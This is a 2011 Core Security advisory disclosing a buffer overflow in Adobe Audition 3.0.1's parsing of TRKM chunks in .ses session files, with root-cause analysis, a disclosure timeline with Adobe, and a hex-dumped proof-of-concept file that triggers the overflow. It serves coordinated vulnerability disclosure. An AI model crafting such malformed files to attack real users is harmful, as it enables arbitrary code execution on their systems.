CORE-2011-0204: Adobe Audition vulnerability processing malformed session file

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Core Security Technologies - Corelabs Advisory
http://corelabs.coresecurity.com/

Adobe Audition vulnerability processing malformed session file

1. Advisory Information

Title: Adobe Audition vulnerability processing malformed session file
Advisory ID: CORE-2011-0204
Advisory URL:
http://www.coresecurity.com/content/Adobe-Audition-malformed-SES-file
Date published: 2011-05-12
Date of last update: 2011-05-12
Vendors contacted: Adobe
Release mode: Coordinated release

2. Vulnerability Information

Class: Buffer Overflow [CWE-119]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-0615

3. Vulnerability Description

Adobe Audition is a digital audio workstation software for Windows that
was originally developed by Syntrillium as Cool Edit Pro, and acquired
by Adobe in 2003. The software allows user to do multitrack audio mixing
and editing and supports storing of multitrack audio using a session
file format (.ses).

Adobe audition is vulnerable to numerous buffer overflows while parsing
several fields inside the TRKM chunk on session (.ses) files. Then, a
memory corruption can be leveraged to execute arbitrary code on
vulnerable systems by enticing users to open specially crafted session
files.

This vulnerability could be used by a remote attacker to execute
arbitrary code with the privileges of the user that opened the malicious
file.

4. Vulnerable packages

   . Adobe Audition 3.0.1.
   . Older versions are probably affected too, but they were not checked.

5. Non-vulnerable packages

   . Adobe Audition CS5.5.

6. Vendor Information, Solutions and Workarounds

Adobe strongly recommends Audition users discontinue use of the Adobe
Session (.ses) file format and switch to use of the XML session format.
With the release of Audition CS5.5, the binary Audition Session (.ses)
file format is no longer supported.

7. Credits

These vulnerabilities were discovered by Diego Juarez, Eduardo Koch and
Laura Balian from Core Security Technologies. Additional research,
exploitability analysis and PoC were made by Diego Juarez from Core
Exploit Writers Team.

8. Technical Description / Proof of Concept Code

Adobe audition is vulnerable to numerous buffer overflows while parsing
several fields inside the 'TRKM' chunk on session (.ses) files.

The vulnerability comes from passing a wrongly assumed max buffer size
to the function found at address 0x483F065A. This function has a
prototype similar to this:

/-----
unsigned int 483F065A(wchar_t *dest, unsigned int size, wchar_t *src);

• -----/
  The 'size' parameter is assumed to be in WCHARs but (while parsing
  session files) the code uses it as a size expressed in bytes, leading to
  multiple buffer overflows in several fields in the 'TRKM' chunk of the
  session file.

8.1. Proof of Concept

The following (dumped) .ses file should trigger the vulnerability.

/-----

00000000: 43 4F 4F 4C-4E 45 53 53-D5 01 00 00-54 52 4B 4D COOLNESS+? TRKM
00000010: 48 A3 00 00-01 00 00 00-07 00 00 00-02 00 00 00 Hú ? ? ?
00000020: 0B 00 00 00-41 00 75 00-64 00 69 00-6F 00 54 00 ? A u d i o T
00000030: 72 00 61 00-63 00 6B 00-00 00 1E A3-00 00 10 27 r a c k ?ú ?'
00000040: 00 00 07 00-00 00 4D 00-61 00 73 00-74 00 65 00 ? M a s t e
00000050: 72 00 00 00-00 00 00 00-00 00 00 00-00 00 30 00 r 0
00000060: 01 00 00 00-00 00 01 00-00 00 00 00-01 00 00 00 ? ? ?
00000070: 20 4E 00 00-01 00 00 00-20 00 00 00-40 1F 00 00 N ? @?
00000080: 02 00 00 00-1B 00 00 00-41 00 75 00-64 00 69 00 ? ? A u d i
00000090: 74 00 69 00-6F 00 6E 00-20 00 33 00-2E 00 30 00 t i o n 3 . 0
000000A0: 20 00 57 00-69 00 6E 00-64 00 6F 00-77 00 73 00 W i n d o w s
000000B0: 20 00 53 00-6F 00 75 00-6E 00 64 00-00 00 05 00 S o u n d ?
000000C0: 00 00 0C 00-00 00 41 00-75 00 64 00-69 00 6F 00 ? A u d i o
000000D0: 20 00 49 00-6E 00 70 00-75 00 74 00-00 00 1B 00 I n p u t ?
000000E0: 00 00 41 00-75 00 64 00-69 00 74 00-69 00 6F 00 A u d i t i o
000000F0: 6E 00 20 00-33 00 2E 00-30 00 20 00-57 00 69 00 n 3 . 0 W i
00000100: 6E 00 64 00-6F 00 77 00-73 00 20 00-53 00 6F 00 n d o w s S o
00000110: 75 00 6E 00-64 00 00 00-FF FF FF FF-0D 00 00 00 u n d ?
00000120: 41 00 75 00-64 00 69 00-6F 00 20 00-4F 00 75 00 A u d i o O u
00000130: 74 00 70 00-75 00 74 00-00 00 00 00-00 00 01 00 t p u t ?
00000140: 00 00 00 00-00 00 00 00-00 00 00 00-00 00 40 00 @
00000150: 00 00 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAA
00000160: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
00000170: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
00000180: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
00000190: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
000001A0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
000001B0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
000001C0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
000001D0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
000001E0: 41 - - - A

• -----/

9. Report Timeline

2011-02-03:
Core Advisories Team notifies Adobe PSIRT several crashes in Adobe
Audition and asks for technical assistance in order to determine if
these crashes can result into a security vulnerability.

2011-02-03:
Vendor acknowledges reception of the last email and notifies that the
Adobe tracking number 850 was opened to track this issue.

2011-02-24:
Core notifies that there has been no communication in the last 3 weeks
and asks for a status update about the reported crashes.

2011-02-28:
Adobe PSIRT notifies that the file format affected by the issue will no
longer be supported with the next release of Audition, planned for May
2011. Vendor also notifies their plan to publish a Security Bulletin,
including an acknowledgement for this report.

2011-03-09:
Core notifies that the impact of these bugs is not clear and requests
technical information to understand the nature and root cause of the
reported crashes rather than purely information about Adobe release
decisions. Core also requires Adobe to clarify if this bug is considered
exploitable and asks if patches or fixes are going to be released as well

2011-03-16:
Core asks for a status update.

2011-03-16:
PSIRT notifies that they have not done any analysis to determine if this
issue is exploitable because:

1. The .ses file format is an older format that will not be supported
   with the next release.
2. The .ses files store information about a recording session; they
   are not typically exchanged between parties over email, and are even
   less likely to be accepted and opened from non-trusted sources.
3. Adobe has been encouraging people to use XML files in place of the
   binary .ses file format for the last year [1].
4. The installed base for Audition is small compared with
   higher-profile Adobe products.

For the above mentioned reasons, vendor considers that it is not a high
priority to perform a vulnerability analysis. Vendor also notifies that
they are currently planning to publish a Security Bulletin in May 2011
with the release of the next major version of Audition.

2011-04-04:
Core notifies that additional research was done by Diego Juarez and the
reported flaws seem to be exploitable. Core notifies the advisory will
be released when these Adobe patches become available.

2011-04-04:
Vendor notifies that the Adobe ID 897 was opened to track this case and
they are on track for releasing patches in May.

2011-04-28:
Core notifies that the advisory publication was rescheduled to May 10th
and requests confirmation for a coordinated release. Core also requests
further information regarding the affected and patched versions numbers.

2011-05-05:
Vendor notifies that these issues should be resolved in the upcoming
release of Adobe Audition planned for May 10th.

2011-05-06:
Vendor notifies that due to a last minute change, the release was
tentatively rescheduled for May 12th.

2011-05-06:
Core reschedules advisory publication for May 12th.

2011-05-12:
Advisory CORE-2011-0204 is published.

10. References

[1]
http://blogs.adobe.com/insidesound/2010/03/audition_xml_session_format.html.

11. About CoreLabs

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.

12. About Core Security Technologies

Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and prove real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.

13. Disclaimer

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

14. PGP/GPG Keys

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)

iEYEARECAAYFAk3MJSwACgkQyNibggitWa0eXQCdHKHspwXyJu8ZwHyf2sFlOrfg
6YwAn0Pf2/bZJ80H2C2IfO0fG9BpvP4d
=EybH
-----END PGP SIGNATURE-----